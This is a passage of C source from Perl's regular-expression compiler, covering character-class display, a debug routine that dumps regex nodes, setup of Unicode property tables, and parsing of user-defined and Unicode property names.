if (flags & ANYOF_SHARED_d_MATCHES_ALL_NON_UTF8_NON_ASCII_non_d_WARN_SUPER)
{
not_utf8 = invlist_clone(PL_UpperLatin1, NULL);
}
}
else if (OP(node) == ANYOFL || OP(node) == ANYOFPOSIXL) {
/* If either of these flags are set, what matches isn't
* determinable except during execution, so don't know enough here
* to invert */
if (flags & (ANYOFL_FOLD|ANYOF_MATCHES_POSIXL)) {
inverting_allowed = FALSE;
}
/* What the posix classes match also varies at runtime, so these
* will be output symbolically. */
if (ANYOF_POSIXL_TEST_ANY_SET(node)) {
int i;
posixes = newSVpvs("");
for (i = 0; i < ANYOF_POSIXL_MAX; i++) {
if (ANYOF_POSIXL_TEST(node, i)) {
sv_catpv(posixes, anyofs[i]);
}
}
}
}
}
/* Accumulate the bit map into the unconditional match list */
if (bitmap) {
for (i = 0; i < NUM_ANYOF_CODE_POINTS; i++) {
if (BITMAP_TEST(bitmap, i)) {
int start = i++;
for (;
i < NUM_ANYOF_CODE_POINTS && BITMAP_TEST(bitmap, i);
i++)
{ /* empty */ }
invlist = _add_range_to_invlist(invlist, start, i-1);
}
}
}
/* Make sure that the conditional match lists don't have anything in them
* that match unconditionally; otherwise the output is quite confusing.
* This could happen if the code that populates these misses some
* duplication. */
if (only_utf8) {
_invlist_subtract(only_utf8, invlist, &only_utf8);
}
if (not_utf8) {
_invlist_subtract(not_utf8, invlist, ¬_utf8);
}
if (only_utf8_locale_invlist) {
/* Since this list is passed in, we have to make a copy before
* modifying it */
only_utf8_locale = invlist_clone(only_utf8_locale_invlist, NULL);
_invlist_subtract(only_utf8_locale, invlist, &only_utf8_locale);
/* And, it can get really weird for us to try outputting an inverted
* form of this list when it has things above the bitmap, so don't even
* try */
if (invlist_highest(only_utf8_locale) >= NUM_ANYOF_CODE_POINTS) {
inverting_allowed = FALSE;
}
}
/* Calculate what the output would be if we take the input as-is */
as_is_display = put_charclass_bitmap_innards_common(invlist,
posixes,
only_utf8,
not_utf8,
only_utf8_locale,
invert);
/* If have to take the output as-is, just do that */
if (! inverting_allowed) {
if (as_is_display) {
sv_catsv(sv, as_is_display);
SvREFCNT_dec_NN(as_is_display);
}
}
else { /* But otherwise, create the output again on the inverted input, and
use whichever version is shorter */
int inverted_bias, as_is_bias;
/* We will apply our bias to whichever of the the results doesn't have
* the '^' */
if (invert) {
invert = FALSE;
as_is_bias = bias;
inverted_bias = 0;
}
else {
invert = TRUE;
as_is_bias = 0;
inverted_bias = bias;
}
/* Now invert each of the lists that contribute to the output,
* excluding from the result things outside the possible range */
/* For the unconditional inversion list, we have to add in all the
* conditional code points, so that when inverted, they will be gone
* from it */
_invlist_union(only_utf8, invlist, &invlist);
_invlist_union(not_utf8, invlist, &invlist);
_invlist_union(only_utf8_locale, invlist, &invlist);
_invlist_invert(invlist);
_invlist_intersection(invlist, PL_InBitmap, &invlist);
if (only_utf8) {
_invlist_invert(only_utf8);
_invlist_intersection(only_utf8, PL_UpperLatin1, &only_utf8);
}
else if (not_utf8) {
/* If a code point matches iff the target string is not in UTF-8,
* then complementing the result has it not match iff not in UTF-8,
* which is the same thing as matching iff it is UTF-8. */
only_utf8 = not_utf8;
not_utf8 = NULL;
}
if (only_utf8_locale) {
_invlist_invert(only_utf8_locale);
_invlist_intersection(only_utf8_locale,
PL_InBitmap,
&only_utf8_locale);
}
inverted_display = put_charclass_bitmap_innards_common(
invlist,
posixes,
only_utf8,
not_utf8,
only_utf8_locale, invert);
/* Use the shortest representation, taking into account our bias
* against showing it inverted */
if ( inverted_display
&& ( ! as_is_display
|| ( SvCUR(inverted_display) + inverted_bias
< SvCUR(as_is_display) + as_is_bias)))
{
sv_catsv(sv, inverted_display);
}
else if (as_is_display) {
sv_catsv(sv, as_is_display);
}
SvREFCNT_dec(as_is_display);
SvREFCNT_dec(inverted_display);
}
SvREFCNT_dec_NN(invlist);
SvREFCNT_dec(only_utf8);
SvREFCNT_dec(not_utf8);
SvREFCNT_dec(posixes);
SvREFCNT_dec(only_utf8_locale);
return SvCUR(sv) > orig_sv_cur;
}
#define CLEAR_OPTSTART \
if (optstart) STMT_START { \
DEBUG_OPTIMISE_r(Perl_re_printf( aTHX_ \
" (%" IVdf " nodes)\n", (IV)(node - optstart))); \
optstart=NULL; \
} STMT_END
#define DUMPUNTIL(b,e) \
CLEAR_OPTSTART; \
node=dumpuntil(r,start,(b),(e),last,sv,indent+1,depth+1);
STATIC const regnode *
S_dumpuntil(pTHX_ const regexp *r, const regnode *start, const regnode *node,
const regnode *last, const regnode *plast,
SV* sv, I32 indent, U32 depth)
{
U8 op = PSEUDO; /* Arbitrary non-END op. */
const regnode *next;
const regnode *optstart= NULL;
RXi_GET_DECL(r, ri);
GET_RE_DEBUG_FLAGS_DECL;
PERL_ARGS_ASSERT_DUMPUNTIL;
#ifdef DEBUG_DUMPUNTIL
Perl_re_printf( aTHX_ "--- %d : %d - %d - %d\n", indent, node-start,
last ? last-start : 0, plast ? plast-start : 0);
#endif
if (plast && plast < last)
last= plast;
while (PL_regkind[op] != END && (!last || node < last)) {
assert(node);
/* While that wasn't END last time... */
NODE_ALIGN(node);
op = OP(node);
if (op == CLOSE || op == SRCLOSE || op == WHILEM)
indent--;
next = regnext((regnode *)node);
/* Where, what. */
if (OP(node) == OPTIMIZED) {
if (!optstart && RE_DEBUG_FLAG(RE_DEBUG_COMPILE_OPTIMISE))
optstart = node;
else
goto after_print;
} else
CLEAR_OPTSTART;
regprop(r, sv, node, NULL, NULL);
Perl_re_printf( aTHX_ "%4" IVdf ":%*s%s", (IV)(node - start),
(int)(2*indent + 1), "", SvPVX_const(sv));
if (OP(node) != OPTIMIZED) {
if (next == NULL) /* Next ptr. */
Perl_re_printf( aTHX_ " (0)");
else if (PL_regkind[(U8)op] == BRANCH
&& PL_regkind[OP(next)] != BRANCH )
Perl_re_printf( aTHX_ " (FAIL)");
else
Perl_re_printf( aTHX_ " (%" IVdf ")", (IV)(next - start));
Perl_re_printf( aTHX_ "\n");
}
after_print:
if (PL_regkind[(U8)op] == BRANCHJ) {
assert(next);
{
const regnode *nnode = (OP(next) == LONGJMP
? regnext((regnode *)next)
: next);
if (last && nnode > last)
nnode = last;
DUMPUNTIL(NEXTOPER(NEXTOPER(node)), nnode);
}
}
else if (PL_regkind[(U8)op] == BRANCH) {
assert(next);
DUMPUNTIL(NEXTOPER(node), next);
}
else if ( PL_regkind[(U8)op] == TRIE ) {
const regnode *this_trie = node;
const char op = OP(node);
const U32 n = ARG(node);
const reg_ac_data * const ac = op>=AHOCORASICK ?
(reg_ac_data *)ri->data->data[n] :
NULL;
const reg_trie_data * const trie =
(reg_trie_data*)ri->data->data[op<AHOCORASICK ? n : ac->trie];
#ifdef DEBUGGING
AV *const trie_words
= MUTABLE_AV(ri->data->data[n + TRIE_WORDS_OFFSET]);
#endif
const regnode *nextbranch= NULL;
I32 word_idx;
SvPVCLEAR(sv);
for (word_idx= 0; word_idx < (I32)trie->wordcount; word_idx++) {
SV ** const elem_ptr = av_fetch(trie_words, word_idx, 0);
Perl_re_indentf( aTHX_ "%s ",
indent+3,
elem_ptr
? pv_pretty(sv, SvPV_nolen_const(*elem_ptr),
SvCUR(*elem_ptr), PL_dump_re_max_len,
PL_colors[0], PL_colors[1],
(SvUTF8(*elem_ptr)
? PERL_PV_ESCAPE_UNI
: 0)
| PERL_PV_PRETTY_ELLIPSES
| PERL_PV_PRETTY_LTGT
)
: "???"
);
if (trie->jump) {
U16 dist= trie->jump[word_idx+1];
Perl_re_printf( aTHX_ "(%" UVuf ")\n",
(UV)((dist ? this_trie + dist : next) - start));
if (dist) {
if (!nextbranch)
nextbranch= this_trie + trie->jump[0];
DUMPUNTIL(this_trie + dist, nextbranch);
}
if (nextbranch && PL_regkind[OP(nextbranch)]==BRANCH)
nextbranch= regnext((regnode *)nextbranch);
} else {
Perl_re_printf( aTHX_ "\n");
}
}
if (last && next > last)
node= last;
else
node= next;
}
else if ( op == CURLY ) { /* "next" might be very big: optimizer */
DUMPUNTIL(NEXTOPER(node) + EXTRA_STEP_2ARGS,
NEXTOPER(node) + EXTRA_STEP_2ARGS + 1);
}
else if (PL_regkind[(U8)op] == CURLY && op != CURLYX) {
assert(next);
DUMPUNTIL(NEXTOPER(node) + EXTRA_STEP_2ARGS, next);
}
else if ( op == PLUS || op == STAR) {
DUMPUNTIL(NEXTOPER(node), NEXTOPER(node) + 1);
}
else if (PL_regkind[(U8)op] == EXACT) {
/* Literal string, where present. */
node += NODE_SZ_STR(node) - 1;
node = NEXTOPER(node);
}
else {
node = NEXTOPER(node);
node += regarglen[(U8)op];
}
if (op == CURLYX || op == OPEN || op == SROPEN)
indent++;
}
CLEAR_OPTSTART;
#ifdef DEBUG_DUMPUNTIL
Perl_re_printf( aTHX_ "--- %d\n", (int)indent);
#endif
return node;
}
#endif /* DEBUGGING */
#ifndef PERL_IN_XSUB_RE
#include "uni_keywords.h"
void
Perl_init_uniprops(pTHX)
{
dVAR;
PL_user_def_props = newHV();
#ifdef USE_ITHREADS
HvSHAREKEYS_off(PL_user_def_props);
PL_user_def_props_aTHX = aTHX;
#endif
/* Set up the inversion list global variables */
PL_XPosix_ptrs[_CC_ASCII] = _new_invlist_C_array(uni_prop_ptrs[UNI_ASCII]);
PL_XPosix_ptrs[_CC_ALPHANUMERIC] = _new_invlist_C_array(uni_prop_ptrs[UNI_XPOSIXALNUM]);
PL_XPosix_ptrs[_CC_ALPHA] = _new_invlist_C_array(uni_prop_ptrs[UNI_XPOSIXALPHA]);
PL_XPosix_ptrs[_CC_BLANK] = _new_invlist_C_array(uni_prop_ptrs[UNI_XPOSIXBLANK]);
PL_XPosix_ptrs[_CC_CASED] = _new_invlist_C_array(uni_prop_ptrs[UNI_CASED]);
PL_XPosix_ptrs[_CC_CNTRL] = _new_invlist_C_array(uni_prop_ptrs[UNI_XPOSIXCNTRL]);
PL_XPosix_ptrs[_CC_DIGIT] = _new_invlist_C_array(uni_prop_ptrs[UNI_XPOSIXDIGIT]);
PL_XPosix_ptrs[_CC_GRAPH] = _new_invlist_C_array(uni_prop_ptrs[UNI_XPOSIXGRAPH]);
PL_XPosix_ptrs[_CC_LOWER] = _new_invlist_C_array(uni_prop_ptrs[UNI_XPOSIXLOWER]);
PL_XPosix_ptrs[_CC_PRINT] = _new_invlist_C_array(uni_prop_ptrs[UNI_XPOSIXPRINT]);
PL_XPosix_ptrs[_CC_PUNCT] = _new_invlist_C_array(uni_prop_ptrs[UNI_XPOSIXPUNCT]);
PL_XPosix_ptrs[_CC_SPACE] = _new_invlist_C_array(uni_prop_ptrs[UNI_XPOSIXSPACE]);
PL_XPosix_ptrs[_CC_UPPER] = _new_invlist_C_array(uni_prop_ptrs[UNI_XPOSIXUPPER]);
PL_XPosix_ptrs[_CC_VERTSPACE] = _new_invlist_C_array(uni_prop_ptrs[UNI_VERTSPACE]);
PL_XPosix_ptrs[_CC_WORDCHAR] = _new_invlist_C_array(uni_prop_ptrs[UNI_XPOSIXWORD]);
PL_XPosix_ptrs[_CC_XDIGIT] = _new_invlist_C_array(uni_prop_ptrs[UNI_XPOSIXXDIGIT]);
PL_Posix_ptrs[_CC_ASCII] = _new_invlist_C_array(uni_prop_ptrs[UNI_ASCII]);
PL_Posix_ptrs[_CC_ALPHANUMERIC] = _new_invlist_C_array(uni_prop_ptrs[UNI_POSIXALNUM]);
PL_Posix_ptrs[_CC_ALPHA] = _new_invlist_C_array(uni_prop_ptrs[UNI_POSIXALPHA]);
PL_Posix_ptrs[_CC_BLANK] = _new_invlist_C_array(uni_prop_ptrs[UNI_POSIXBLANK]);
PL_Posix_ptrs[_CC_CASED] = PL_Posix_ptrs[_CC_ALPHA];
PL_Posix_ptrs[_CC_CNTRL] = _new_invlist_C_array(uni_prop_ptrs[UNI_POSIXCNTRL]);
PL_Posix_ptrs[_CC_DIGIT] = _new_invlist_C_array(uni_prop_ptrs[UNI_POSIXDIGIT]);
PL_Posix_ptrs[_CC_GRAPH] = _new_invlist_C_array(uni_prop_ptrs[UNI_POSIXGRAPH]);
PL_Posix_ptrs[_CC_LOWER] = _new_invlist_C_array(uni_prop_ptrs[UNI_POSIXLOWER]);
PL_Posix_ptrs[_CC_PRINT] = _new_invlist_C_array(uni_prop_ptrs[UNI_POSIXPRINT]);
PL_Posix_ptrs[_CC_PUNCT] = _new_invlist_C_array(uni_prop_ptrs[UNI_POSIXPUNCT]);
PL_Posix_ptrs[_CC_SPACE] = _new_invlist_C_array(uni_prop_ptrs[UNI_POSIXSPACE]);
PL_Posix_ptrs[_CC_UPPER] = _new_invlist_C_array(uni_prop_ptrs[UNI_POSIXUPPER]);
PL_Posix_ptrs[_CC_VERTSPACE] = NULL;
PL_Posix_ptrs[_CC_WORDCHAR] = _new_invlist_C_array(uni_prop_ptrs[UNI_POSIXWORD]);
PL_Posix_ptrs[_CC_XDIGIT] = _new_invlist_C_array(uni_prop_ptrs[UNI_POSIXXDIGIT]);
PL_GCB_invlist = _new_invlist_C_array(_Perl_GCB_invlist);
PL_SB_invlist = _new_invlist_C_array(_Perl_SB_invlist);
PL_WB_invlist = _new_invlist_C_array(_Perl_WB_invlist);
PL_LB_invlist = _new_invlist_C_array(_Perl_LB_invlist);
PL_SCX_invlist = _new_invlist_C_array(_Perl_SCX_invlist);
PL_AboveLatin1 = _new_invlist_C_array(AboveLatin1_invlist);
PL_Latin1 = _new_invlist_C_array(Latin1_invlist);
PL_UpperLatin1 = _new_invlist_C_array(UpperLatin1_invlist);
PL_Assigned_invlist = _new_invlist_C_array(uni_prop_ptrs[UNI_ASSIGNED]);
PL_utf8_perl_idstart = _new_invlist_C_array(uni_prop_ptrs[UNI__PERL_IDSTART]);
PL_utf8_perl_idcont = _new_invlist_C_array(uni_prop_ptrs[UNI__PERL_IDCONT]);
PL_utf8_charname_begin = _new_invlist_C_array(uni_prop_ptrs[UNI__PERL_CHARNAME_BEGIN]);
PL_utf8_charname_continue = _new_invlist_C_array(uni_prop_ptrs[UNI__PERL_CHARNAME_CONTINUE]);
PL_in_some_fold = _new_invlist_C_array(uni_prop_ptrs[UNI__PERL_ANY_FOLDS]);
PL_HasMultiCharFold = _new_invlist_C_array(uni_prop_ptrs[
UNI__PERL_FOLDS_TO_MULTI_CHAR]);
PL_InMultiCharFold = _new_invlist_C_array(uni_prop_ptrs[
UNI__PERL_IS_IN_MULTI_CHAR_FOLD]);
PL_NonFinalFold = _new_invlist_C_array(uni_prop_ptrs[
UNI__PERL_NON_FINAL_FOLDS]);
PL_utf8_toupper = _new_invlist_C_array(Uppercase_Mapping_invlist);
PL_utf8_tolower = _new_invlist_C_array(Lowercase_Mapping_invlist);
PL_utf8_totitle = _new_invlist_C_array(Titlecase_Mapping_invlist);
PL_utf8_tofold = _new_invlist_C_array(Case_Folding_invlist);
PL_utf8_tosimplefold = _new_invlist_C_array(Simple_Case_Folding_invlist);
PL_utf8_foldclosures = _new_invlist_C_array(_Perl_IVCF_invlist);
PL_utf8_mark = _new_invlist_C_array(uni_prop_ptrs[UNI_M]);
PL_CCC_non0_non230 = _new_invlist_C_array(_Perl_CCC_non0_non230_invlist);
PL_Private_Use = _new_invlist_C_array(uni_prop_ptrs[UNI_CO]);
#ifdef UNI_XIDC
/* The below are used only by deprecated functions. They could be removed */
PL_utf8_xidcont = _new_invlist_C_array(uni_prop_ptrs[UNI_XIDC]);
PL_utf8_idcont = _new_invlist_C_array(uni_prop_ptrs[UNI_IDC]);
PL_utf8_xidstart = _new_invlist_C_array(uni_prop_ptrs[UNI_XIDS]);
#endif
}
#if 0
This code was mainly added for backcompat to give a warning for non-portable
code points in user-defined properties. But experiments showed that the
warning in earlier perls were only omitted on overflow, which should be an
error, so there really isnt a backcompat issue, and actually adding the
warning when none was present before might cause breakage, for little gain. So
khw left this code in, but not enabled. Tests were never added.
embed.fnc entry:
Ei |const char *|get_extended_utf8_msg|const UV cp
PERL_STATIC_INLINE const char *
S_get_extended_utf8_msg(pTHX_ const UV cp)
{
U8 dummy[UTF8_MAXBYTES + 1];
HV *msgs;
SV **msg;
uvchr_to_utf8_flags_msgs(dummy, cp, UNICODE_WARN_PERL_EXTENDED,
&msgs);
msg = hv_fetchs(msgs, "text", 0);
assert(msg);
(void) sv_2mortal((SV *) msgs);
return SvPVX(*msg);
}
#endif
SV *
Perl_handle_user_defined_property(pTHX_
/* Parses the contents of a user-defined property definition; returning the
* expanded definition if possible. If so, the return is an inversion
* list.
*
* If there are subroutines that are part of the expansion and which aren't
* known at the time of the call to this function, this returns what
* parse_uniprop_string() returned for the first one encountered.
*
* If an error was found, NULL is returned, and 'msg' gets a suitable
* message appended to it. (Appending allows the back trace of how we got
* to the faulty definition to be displayed through nested calls of
* user-defined subs.)
*
* The caller IS responsible for freeing any returned SV.
*
* The syntax of the contents is pretty much described in perlunicode.pod,
* but we also allow comments on each line */
const char * name, /* Name of property */
const STRLEN name_len, /* The name's length in bytes */
const bool is_utf8, /* ? Is 'name' encoded in UTF-8 */
const bool to_fold, /* ? Is this under /i */
const bool runtime, /* ? Are we in compile- or run-time */
const bool deferrable, /* Is it ok for this property's full definition
to be deferred until later? */
SV* contents, /* The property's definition */
bool *user_defined_ptr, /* This will be set TRUE as we wouldn't be
getting called unless this is thought to be
a user-defined property */
SV * msg, /* Any error or warning msg(s) are appended to
this */
const STRLEN level) /* Recursion level of this call */
{
STRLEN len;
const char * string = SvPV_const(contents, len);
const char * const e = string + len;
const bool is_contents_utf8 = cBOOL(SvUTF8(contents));
const STRLEN msgs_length_on_entry = SvCUR(msg);
const char * s0 = string; /* Points to first byte in the current line
being parsed in 'string' */
const char overflow_msg[] = "Code point too large in \"";
SV* running_definition = NULL;
PERL_ARGS_ASSERT_HANDLE_USER_DEFINED_PROPERTY;
*user_defined_ptr = TRUE;
/* Look at each line */
while (s0 < e) {
const char * s; /* Current byte */
char op = '+'; /* Default operation is 'union' */
IV min = 0; /* range begin code point */
IV max = -1; /* and range end */
SV* this_definition;
/* Skip comment lines */
if (*s0 == '#') {
s0 = strchr(s0, '\n');
if (s0 == NULL) {
break;
}
s0++;
continue;
}
/* For backcompat, allow an empty first line */
if (*s0 == '\n') {
s0++;
continue;
}
/* First character in the line may optionally be the operation */
if ( *s0 == '+'
|| *s0 == '!'
|| *s0 == '-'
|| *s0 == '&')
{
op = *s0++;
}
/* If the line is one or two hex digits separated by blank space, its
* a range; otherwise it is either another user-defined property or an
* error */
s = s0;
if (! isXDIGIT(*s)) {
goto check_if_property;
}
do { /* Each new hex digit will add 4 bits. */
if (min > ( (IV) MAX_LEGAL_CP >> 4)) {
s = strchr(s, '\n');
if (s == NULL) {
s = e;
}
if (SvCUR(msg) > 0) sv_catpvs(msg, "; ");
sv_catpv(msg, overflow_msg);
Perl_sv_catpvf(aTHX_ msg, "%" UTF8f,
UTF8fARG(is_contents_utf8, s - s0, s0));
sv_catpvs(msg, "\"");
goto return_failure;
}
/* Accumulate this digit into the value */
min = (min << 4) + READ_XDIGIT(s);
} while (isXDIGIT(*s));
while (isBLANK(*s)) { s++; }
/* We allow comments at the end of the line */
if (*s == '#') {
s = strchr(s, '\n');
if (s == NULL) {
s = e;
}
s++;
}
else if (s < e && *s != '\n') {
if (! isXDIGIT(*s)) {
goto check_if_property;
}
/* Look for the high point of the range */
max = 0;
do {
if (max > ( (IV) MAX_LEGAL_CP >> 4)) {
s = strchr(s, '\n');
if (s == NULL) {
s = e;
}
if (SvCUR(msg) > 0) sv_catpvs(msg, "; ");
sv_catpv(msg, overflow_msg);
Perl_sv_catpvf(aTHX_ msg, "%" UTF8f,
UTF8fARG(is_contents_utf8, s - s0, s0));
sv_catpvs(msg, "\"");
goto return_failure;
}
max = (max << 4) + READ_XDIGIT(s);
} while (isXDIGIT(*s));
while (isBLANK(*s)) { s++; }
if (*s == '#') {
s = strchr(s, '\n');
if (s == NULL) {
s = e;
}
}
else if (s < e && *s != '\n') {
goto check_if_property;
}
}
if (max == -1) { /* The line only had one entry */
max = min;
}
else if (max < min) {
if (SvCUR(msg) > 0) sv_catpvs(msg, "; ");
sv_catpvs(msg, "Illegal range in \"");
Perl_sv_catpvf(aTHX_ msg, "%" UTF8f,
UTF8fARG(is_contents_utf8, s - s0, s0));
sv_catpvs(msg, "\"");
goto return_failure;
}
#if 0 /* See explanation at definition above of get_extended_utf8_msg() */
if ( UNICODE_IS_PERL_EXTENDED(min)
|| UNICODE_IS_PERL_EXTENDED(max))
{
if (SvCUR(msg) > 0) sv_catpvs(msg, "; ");
/* If both code points are non-portable, warn only on the lower
* one. */
sv_catpv(msg, get_extended_utf8_msg(
(UNICODE_IS_PERL_EXTENDED(min))
? min : max));
sv_catpvs(msg, " in \"");
Perl_sv_catpvf(aTHX_ msg, "%" UTF8f,
UTF8fARG(is_contents_utf8, s - s0, s0));
sv_catpvs(msg, "\"");
}
#endif
/* Here, this line contains a legal range */
this_definition = sv_2mortal(_new_invlist(2));
this_definition = _add_range_to_invlist(this_definition, min, max);
goto calculate;
check_if_property:
/* Here it isn't a legal range line. See if it is a legal property
* line. First find the end of the meat of the line */
s = strpbrk(s, "#\n");
if (s == NULL) {
s = e;
}
/* Ignore trailing blanks in keeping with the requirements of
* parse_uniprop_string() */
s--;
while (s > s0 && isBLANK_A(*s)) {
s--;
}
s++;
this_definition = parse_uniprop_string(s0, s - s0,
is_utf8, to_fold, runtime,
deferrable,
user_defined_ptr, msg,
(name_len == 0)
? level /* Don't increase level
if input is empty */
: level + 1
);
if (this_definition == NULL) {
goto return_failure; /* 'msg' should have had the reason
appended to it by the above call */
}
if (! is_invlist(this_definition)) { /* Unknown at this time */
return newSVsv(this_definition);
}
if (*s != '\n') {
s = strchr(s, '\n');
if (s == NULL) {
s = e;
}
}
calculate:
switch (op) {
case '+':
_invlist_union(running_definition, this_definition,
&running_definition);
break;
case '-':
_invlist_subtract(running_definition, this_definition,
&running_definition);
break;
case '&':
_invlist_intersection(running_definition, this_definition,
&running_definition);
break;
case '!':
_invlist_union_complement_2nd(running_definition,
this_definition, &running_definition);
break;
default:
Perl_croak(aTHX_ "panic: %s: %d: Unexpected operation %d",
__FILE__, __LINE__, op);
break;
}
/* Position past the '\n' */
s0 = s + 1;
} /* End of loop through the lines of 'contents' */
/* Here, we processed all the lines in 'contents' without error. If we
* didn't add any warnings, simply return success */
if (msgs_length_on_entry == SvCUR(msg)) {
/* If the expansion was empty, the answer isn't nothing: its an empty
* inversion list */
if (running_definition == NULL) {
running_definition = _new_invlist(1);
}
return running_definition;
}
/* Otherwise, add some explanatory text, but we will return success */
goto return_msg;
return_failure:
running_definition = NULL;
return_msg:
if (name_len > 0) {
sv_catpvs(msg, " in expansion of ");
Perl_sv_catpvf(aTHX_ msg, "%" UTF8f, UTF8fARG(is_utf8, name_len, name));
}
return running_definition;
}
/* As explained below, certain operations need to take place in the first
* thread created. These macros switch contexts */
#ifdef USE_ITHREADS
# define DECLARATION_FOR_GLOBAL_CONTEXT \
PerlInterpreter * save_aTHX = aTHX;
# define SWITCH_TO_GLOBAL_CONTEXT \
PERL_SET_CONTEXT((aTHX = PL_user_def_props_aTHX))
# define RESTORE_CONTEXT PERL_SET_CONTEXT((aTHX = save_aTHX));
# define CUR_CONTEXT aTHX
# define ORIGINAL_CONTEXT save_aTHX
#else
# define DECLARATION_FOR_GLOBAL_CONTEXT
# define SWITCH_TO_GLOBAL_CONTEXT NOOP
# define RESTORE_CONTEXT NOOP
# define CUR_CONTEXT NULL
# define ORIGINAL_CONTEXT NULL
#endif
STATIC void
S_delete_recursion_entry(pTHX_ void *key)
{
/* Deletes the entry used to detect recursion when expanding user-defined
* properties. This is a function so it can be set up to be called even if
* the program unexpectedly quits */
dVAR;
SV ** current_entry;
const STRLEN key_len = strlen((const char *) key);
DECLARATION_FOR_GLOBAL_CONTEXT;
SWITCH_TO_GLOBAL_CONTEXT;
/* If the entry is one of these types, it is a permanent entry, and not the
* one used to detect recursions. This function should delete only the
* recursion entry */
current_entry = hv_fetch(PL_user_def_props, (const char *) key, key_len, 0);
if ( current_entry
&& ! is_invlist(*current_entry)
&& ! SvPOK(*current_entry))
{
(void) hv_delete(PL_user_def_props, (const char *) key, key_len,
G_DISCARD);
}
RESTORE_CONTEXT;
}
STATIC SV *
S_get_fq_name(pTHX_
const char * const name, /* The first non-blank in the \p{}, \P{} */
const Size_t name_len, /* Its length in bytes, not including any trailing space */
const bool is_utf8, /* ? Is 'name' encoded in UTF-8 */
const bool has_colon_colon
)
{
/* Returns a mortal SV containing the fully qualified version of the input
* name */
SV * fq_name;
fq_name = newSVpvs_flags("", SVs_TEMP);
/* Use the current package if it wasn't included in our input */
if (! has_colon_colon) {
const HV * pkg = (IN_PERL_COMPILETIME)
? PL_curstash
: CopSTASH(PL_curcop);
const char* pkgname = HvNAME(pkg);
Perl_sv_catpvf(aTHX_ fq_name, "%" UTF8f,
UTF8fARG(is_utf8, strlen(pkgname), pkgname));
sv_catpvs(fq_name, "::");
}
Perl_sv_catpvf(aTHX_ fq_name, "%" UTF8f,
UTF8fARG(is_utf8, name_len, name));
return fq_name;
}
SV *
Perl_parse_uniprop_string(pTHX_
/* Parse the interior of a \p{}, \P{}. Returns its definition if knowable
* now. If so, the return is an inversion list.
*
* If the property is user-defined, it is a subroutine, which in turn
* may call other subroutines. This function will call the whole nest of
* them to get the definition they return; if some aren't known at the time
* of the call to this function, the fully qualified name of the highest
* level sub is returned. It is an error to call this function at runtime
* without every sub defined.
*
* If an error was found, NULL is returned, and 'msg' gets a suitable
* message appended to it. (Appending allows the back trace of how we got
* to the faulty definition to be displayed through nested calls of
* user-defined subs.)
*
* The caller should NOT try to free any returned inversion list.
*
* Other parameters will be set on return as described below */
const char * const name, /* The first non-blank in the \p{}, \P{} */
const Size_t name_len, /* Its length in bytes, not including any
trailing space */
const bool is_utf8, /* ? Is 'name' encoded in UTF-8 */
const bool to_fold, /* ? Is this under /i */
const bool runtime, /* TRUE if this is being called at run time */
const bool deferrable, /* TRUE if it's ok for the definition to not be
known at this call */
bool *user_defined_ptr, /* Upon return from this function it will be
set to TRUE if any component is a
user-defined property */
SV * msg, /* Any error or warning msg(s) are appended to
this */
const STRLEN level) /* Recursion level of this call */
{
dVAR;
char* lookup_name; /* normalized name for lookup in our tables */
unsigned lookup_len; /* Its length */
bool stricter = FALSE; /* Some properties have stricter name
normalization rules, which we decide upon
based on parsing */
/* nv= or numeric_value=, or possibly one of the cjk numeric properties
* (though it requires extra effort to download them from Unicode and
* compile perl to know about them) */
bool is_nv_type = FALSE;
unsigned int i, j = 0;
int equals_pos = -1; /* Where the '=' is found, or negative if none */
int slash_pos = -1; /* Where the '/' is found, or negative if none */
int table_index = 0; /* The entry number for this property in the table
of all Unicode property names */
bool starts_with_In_or_Is = FALSE; /* ? Does the name start with 'In' or
'Is' */
Size_t lookup_offset = 0; /* Used to ignore the first few characters of
the normalized name in certain situations */
Size_t non_pkg_begin = 0; /* Offset of first byte in 'name' that isn't
part of a package name */
bool could_be_user_defined = TRUE; /* ? Could this be a user-defined
property rather than a Unicode
one. */
SV * prop_definition = NULL; /* The returned definition of 'name' or NULL
if an error. If it is an inversion list,
it is the definition. Otherwise it is a
string containing the fully qualified sub
name of 'name' */
SV * fq_name = NULL; /* For user-defined properties, the fully
qualified name */
bool invert_return = FALSE; /* ? Do we need to complement the result before
returning it */
PERL_ARGS_ASSERT_PARSE_UNIPROP_STRING;
/* The input will be normalized into 'lookup_name' */
Newx(lookup_name, name_len, char);
SAVEFREEPV(lookup_name);
/* Parse the input. */
for (i = 0; i < name_len; i++) {
char cur = name[i];
/* Most of the characters in the input will be of this ilk, being parts
* of a name */
if (isIDCONT_A(cur)) {
/* Case differences are ignored. Our lookup routine assumes
* everything is lowercase, so normalize to that */
if (isUPPER_A(cur)) {
lookup_name[j++] = toLOWER_A(cur);
continue;
}
if (cur == '_') { /* Don't include these in the normalized name */
continue;
}
lookup_name[j++] = cur;
/* The first character in a user-defined name must be of this type.
* */
if (i - non_pkg_begin == 0 && ! isIDFIRST_A(cur)) {
could_be_user_defined = FALSE;
}
continue;
}
/* Here, the character is not something typically in a name, But these
* two types of characters (and the '_' above) can be freely ignored in
* most situations. Later it may turn out we shouldn't have ignored
* them, and we have to reparse, but we don't have enough information
* yet to make that decision */
if (cur == '-' || isSPACE_A(cur)) {
could_be_user_defined = FALSE;
continue;
}
/* An equals sign or single colon mark the end of the first part of
* the property name */
if ( cur == '='
|| (cur == ':' && (i >= name_len - 1 || name[i+1] != ':')))
{
lookup_name[j++] = '='; /* Treat the colon as an '=' */
equals_pos = j; /* Note where it occurred in the input */
could_be_user_defined = FALSE;
break;
}
/* Otherwise, this character is part of the name. */
lookup_name[j++] = cur;
/* Here it isn't a single colon, so if it is a colon, it must be a
* double colon */
if (cur == ':') {
/* A double colon should be a package qualifier. We note its
* position and continue. Note that one could have
* pkg1::pkg2::...::foo
* so that the position at the end of the loop will be just after
* the final qualifier */
i++;
non_pkg_begin = i + 1;
lookup_name[j++] = ':';
}
else { /* Only word chars (and '::') can be in a user-defined name */
could_be_user_defined = FALSE;
}
} /* End of parsing through the lhs of the property name (or all of it if
no rhs) */
#define STRLENs(s) (sizeof("" s "") - 1)
/* If there is a single package name 'utf8::', it is ambiguous. It could
* be for a user-defined property, or it could be a Unicode property, as
* all of them are considered to be for that package. For the purposes of
* parsing the rest of the property, strip it off */
if (non_pkg_begin == STRLENs("utf8::") && memBEGINPs(name, name_len, "utf8::")) {
lookup_name += STRLENs("utf8::");
j -= STRLENs("utf8::");
equals_pos -= STRLENs("utf8::");
}
/* Here, we are either done with the whole property name, if it was simple;
* or are positioned just after the '=' if it is compound. */
if (equals_pos >= 0) {
assert(! stricter); /* We shouldn't have set this yet */
